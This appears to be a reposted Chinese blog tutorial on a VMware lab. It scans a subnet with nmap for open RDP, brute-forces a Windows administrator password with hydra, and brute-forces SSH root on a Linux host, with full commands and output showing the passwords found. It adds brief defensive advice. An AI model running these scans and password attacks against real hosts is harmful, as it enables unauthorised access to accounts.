admin管理员组文章数量:1637858
文章目录
- 设置防火墙为关闭状态
- 防火墙是禁用状态
- 设置注册表,设置完重启
- 关闭防火墙或者设置入口3389
- 设置用户账号及密码
- window密码破解
- 使用nmap查询开启3389端口的主机
- hydra 九头蛇工具破解
- 防护措施
- 附加: 九头蛇破解 Linux
- xhydra 图形化界面攻击
设置防火墙为关闭状态
防火墙是禁用状态
设置注册表,设置完重启
关闭防火墙或者设置入口3389
设置用户账号及密码
window密码破解
使用nmap查询开启3389端口的主机
nmap -p 3389 192.168.73.1-254
-p是指定端口
192.168.73.1-254 ip范围设置
可以看到存活有open的主机为:192.168.73.137
┌──(root㉿kali)-[~]
└─# nmap -p 3389 192.168.73.1-254
Starting Nmap 7.92 ( https://nmap.org ) at 2023-10-18 23:55 EDT
Nmap scan report for 192.168.73.1
Host is up (0.00060s latency).
PORT STATE SERVICE
3389/tcp closed ms-wbt-server
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.73.2
Host is up (0.00059s latency).
PORT STATE SERVICE
3389/tcp closed ms-wbt-server
MAC Address: 00:50:56:EF:75:A9 (VMware)
Nmap scan report for 192.168.73.129
Host is up (0.00050s latency).
PORT STATE SERVICE
3389/tcp closed ms-wbt-server
MAC Address: 00:0C:29:98:14:64 (VMware)
Nmap scan report for 192.168.73.137
Host is up (0.00074s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
MAC Address: 00:0C:29:F7:AD:82 (VMware)
Nmap scan report for 192.168.73.254
Host is up (0.00042s latency).
PORT STATE SERVICE
3389/tcp filtered ms-wbt-server
MAC Address: 00:50:56:E4:78:30 (VMware)
Nmap scan report for 192.168.73.133
Host is up (0.00064s latency).
PORT STATE SERVICE
3389/tcp closed ms-wbt-server
Nmap done: 254 IP addresses (6 hosts up) scanned in 2.30 seconds
hydra 九头蛇工具破解
hydra -l administrator -P /data/password/systemPassword.txt rdp://192.168.73.137:3389
hydra 九头蛇工具,kali自带
-l 用户名
-P 密码
rdp协议
3389远程端口
┌──(root㉿kali)-[~]
└─# hydra -l administrator -P /data/password/systemPassword.txt rdp://192.168.73.137:3389
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-10-19 00:04:17
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking rdp://192.168.73.137:3389/
[3389][rdp] host: 192.168.73.137 login: administrator password: Admin12345
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-10-19 00:04:18
防护措施
1、关掉3389远程端口服务,开启防火墙,删除3389入站规则
2、密码复杂度提升,数字+大小写字母+特殊字符
3、杀毒软件及安全软件进行安装
附加: 九头蛇破解 Linux
hydra -l root -P /data/password/systemPassword.txt ssh://192.168.73.129:22
-l 用户名
-P 字典文件
ssh 协议
┌──(root㉿kali)-[~]
└─# hydra -l root -P /data/password/systemPassword.txt ssh://192.168.73.129:22
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-10-19 02:59:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), ~1 try per task
[DATA] attacking ssh://192.168.73.129:22/
[22][ssh] host: 192.168.73.129 login: root password: root
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-10-19 02:59:34
xhydra 图形化界面攻击
xhydra
┌──(root㉿kali)-[~]
└─# xhydra
Gtk-Message: 03:17:03.092: Failed to load module "gail"
** (xhydra:128712): WARNING **: 03:17:03.112: (../atk-adaptor/bridge.c:1018):atk_bridge_adaptor_init: runtime check failed: (root)
版权声明:本文标题:【kali】Windows10登录密码破解及防御( hydra 九头蛇破解) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/xitong/1729253411a1192428.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论